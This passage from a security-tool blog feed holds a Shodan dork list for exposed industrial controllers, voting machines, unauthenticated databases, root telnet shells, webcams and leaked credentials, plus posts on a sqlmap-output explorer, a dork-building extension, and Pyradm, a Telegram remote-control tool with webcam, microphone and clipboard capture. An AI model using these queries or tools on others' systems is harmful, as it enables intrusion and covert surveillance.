<code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 
2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" 
port:10001</code></p> <h3>Fuel Pumps connected to the internet:</h3> <p>No auth required to access the CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p><code>"voter system serial" country:US</code></p> <h3>Open ATM:</h3> <p>May indicate ATM access availability. <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC 
Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla PowerPack Charging Status:</h3> <p>Helps to find the charging status of Tesla PowerPacks. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike 
Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. 
<code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy, fractured update approach. More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find cleartext Wi-Fi passwords in Shodan. 
<code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured WordPress Sites:</h3> <p>If accessible, wp-config.php can expose the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results; narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." 
port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers & Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, 
etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Ethereum Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-28563560138004185342024-03-17T08:30:00.005-03:002024-03-17T08:30:00.135-03:00mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu"><img alt="" 
border="0" height="640" id="BLOGGER_PHOTO_ID_7345629037921874834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu=w640-h640" width="640" /></a></p> <p><strong><br /></strong></p><p><strong>mapXplore</strong> is a modular application that imports data extracted by <a href="https://www.kitploit.com/search/label/SQLMap" target="_blank" title="sqlmap">sqlmap</a> into a <a href="https://www.kitploit.com/search/label/PostgreSQL" target="_blank" title="PostgreSQL">PostgreSQL</a> or <a href="https://www.kitploit.com/search/label/SQLite" target="_blank" title="SQLite">SQLite</a> database.</p> <p>Its main features are:</p> <ul> <li>Import of information extracted from sqlmap into PostgreSQL or SQLite for subsequent querying.</li> <li>Sanitized information: at the time of import, it decodes or transforms unreadable information into readable information.</li> <li>Search for information in all tables, such as passwords, users and other information of interest.</li> <li> <p>Automatic export of information stored in <strong>base64</strong>, such as:</p> <ul> <li>Word, Excel, PowerPoint files</li> <li>.zip files</li> <li>Text files or plain text information</li> <li>Images</li> </ul> </li> <li> <p>Filter tables and columns by criteria.</p> </li> <li>Filter by different types of hash functions without requiring prior conversion.</li> <li>Export relevant information to Excel or HTML</li></ul><span><a name='more'></a></span><div><br /></div> <h1>Installation</h1> <h2>Requirements</h2> <ul> <li>python-3.11</li> </ul> <pre><code>git clone https://github.com/daniel2005d/mapXplore<br />cd mapXplore<br />pip install -r requirements<br /></code></pre> <h1>Usage</h1> <p>It is a modular application consisting of the following modules:</p> <ul> <li><strong>config</strong>: It is responsible for 
configuration, such as the database <a href="https://www.kitploit.com/search/label/Engine" target="_blank" title="engine">engine</a> to use, import paths, among others.</li> <li><strong>import</strong>: It is responsible for importing and processing the information extracted from <strong>sqlmap</strong>.</li> <li><strong>query</strong>: It is the main module, capable of filtering and extracting the required information.<ul> <li>Filter by tables</li> <li>Filter by columns</li> <li>Filter by one or more words</li> <li>Filter by one or more hash functions, including:<ul> <li>MD5</li> <li>SHA1</li> <li>SHA256</li> <li>SHA3</li> <li>....</li> </ul> </li> </ul> </li> </ul> <h3>Beginning</h3> <blockquote> <p>Allows loading a default configuration at the start of the program</p> </blockquote> <pre><code>python engine.py [--config config.json]<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7345629069448547762" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s=w640-h292" width="640" /></a></p> <h2>Modules</h2> <ul> <li><a href="https://github.com/daniel2005d/doc/en/configuration.md" rel="nofollow" target="_blank" title="config">config</a></li> <li><a href="https://github.com/daniel2005d/doc/en/import.md" rel="nofollow" target="_blank" title="import">import</a></li> <li><a href="https://github.com/daniel2005d/doc/en/main.md" rel="nofollow" target="_blank" title="principal|search">principal|search</a></li> </ul><br /><br /><div style="text-align: center;"><b><span 
style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/daniel2005d/mapXplore" rel="nofollow" target="_blank" title="Download mapXplore">Download mapXplore</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-30578830815800991132024-03-16T08:30:00.007-03:002024-03-16T08:30:00.240-03:00Dorkish - Chrome Extension Tool For OSINT & Recon<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345707297268900690" src="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U=w542-h640" width="542" /></a></p><br /> <p>During the <a href="https://www.kitploit.com/search/label/Reconaissance" target="_blank" title="reconnaissance">reconnaissance</a> phase or when doing OSINT, we often use Google dorking and Shodan, hence the idea of Dorkish. 
<br /> Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using its builder, and it offers prebuilt dorks for efficient <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> and OSINT engagements.</p><span><a name='more'></a></span><p><br /></p> <h1>Installation And Setup</h1> <p>1- Clone the repository:</p> <pre><code>git clone https://github.com/yousseflahouifi/dorkish.git<br /></code></pre> <p>2- Go to chrome://extensions/ and enable Developer mode in the top right corner.<br /> 3- Click the Load unpacked extension button and select the dorkish folder.</p> <p><strong>Note:</strong> Firefox users can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/</p> <h1>Features</h1> <h2>Google dorking</h2> <ul> <li>Builder with keywords to filter your Google search results.</li> <li>Prebuilt dorks for bug bounty programs.</li> <li>Prebuilt dorks used during the reconnaissance phase in bug bounty.</li> <li>Prebuilt dorks for exposed files and directories.</li> <li>Prebuilt dorks for login and sign-up portals.</li> <li>Prebuilt dorks for cyber security jobs.</li> </ul> <h2>Shodan dorking</h2> <ul> <li>Builder with the filter keywords used in Shodan.</li> <li>Variety of prebuilt dorks to find IoT devices, network <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a>, <a href="https://www.kitploit.com/search/label/Cameras" target="_blank" title="cameras">cameras</a>, ICS, databases, etc.</li> </ul> <h1>Usage</h1> <p>Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. 
Then, you can explore and enjoy the results that match your query.</p> <h1>TODO</h1> <ul> <li>Add more useful dorks and categories</li> <li>Fix some bugs</li> <li>Add a search bar to search through the results</li> <li>Might add some LLM models to build dorks</li></ul> <h1>Notes</h1> <p>I have built some dorks and I have used some public resources to gather the dorks; here are a few:</p> <ul> <li>https://github.com/lothos612/shodan</li> <li>https://github.com/TakSec/google-dorks-bug-bounty</li> </ul> <h1>Warning</h1> <ul> <li>I am not responsible for any damage caused by using the tool</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/yousseflahouifi/dorkish" rel="nofollow" target="_blank" title="Download Dorkish">Download Dorkish</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24110378230006001572024-03-15T08:30:00.019-03:002024-03-15T08:30:00.251-03:00Pyradm - Python Remote Administration Tool Via Telegram<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8" style="text-align: left;"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a></p><p><br /></p> <blockquote> <p>Remote administration cross-platform tool via Telegram<br /> Coded with ❤️ <strong>python3</strong> + <strong>aiogram3</strong><br /> https://t.me/pt_soft</p> </blockquote> <h2>v0.3</h2> <ul> <li>[X] <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" 
title="Screenshot">Screenshot</a> from target</li> <li>[X] Crossplatform</li> <li>[X] Upload/Download</li> <li>[X] Fully compatible shell</li> <li>[X] Process list</li> <li>[X] <a href="https://www.kitploit.com/search/label/Webcam" target="_blank" title="Webcam">Webcam</a> (video record or screenshot)</li> <li>[X] Geolocation</li> <li>[X] Filemanager</li> <li>[X] Microphone</li> <li>[X] Clipboard (text, image)</li> </ul><span><a name='more'></a></span><div><br /></div> <h2>Functional</h2> <pre><code>/start - start pyradm<br />/help - help<br />/shell - shell commands<br />/sc - screenshot<br />/download - download (abs. path)<br />/info - system info<br />/ip - public ip address and geolocation<br />/ps - process list<br />/webcam 5 - record video (secs)<br />/webcam - screenshot from camera<br />/fm - filemanager<br />/fm /home or /fm C:\<br />/mic 10 - <a href="https://www.kitploit.com/search/label/Record%20Audio" target="_blank" title="record audio">record audio</a> from mic<br />/clip - get clipboard data<br />Press button to download file<br />Send any file as file for upload to target<br /></code></pre> <h2>Install</h2> <ul> <li><code>git clone https://github.com/akhomlyuk/pyradm.git</code></li> <li><code>cd pyradm</code></li> <li><code>pip3 install -r requirements.txt</code></li> <li><code>Put bot <a href="https://www.kitploit.com/search/label/Token" target="_blank" title="token">token</a> to cfg.py, ask @Bothfather</code></li> <li><code>python3 main.py</code></li> </ul> <h2>Compile</h2> <ul> <li><code>Put bot token to cfg.py</code></li> <li><code>pip install nuitka</code></li> <li><code>nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py</code></li> </ul> <h2>Screens</h2> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705598837786290" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA=w612-h640" width="612" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705607758732882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA=w352-h640" width="352" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4"><img alt="" border="0" height="624" id="BLOGGER_PHOTO_ID_7345705610000417314" src="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4=w640-h624" width="640" /></a> <a 
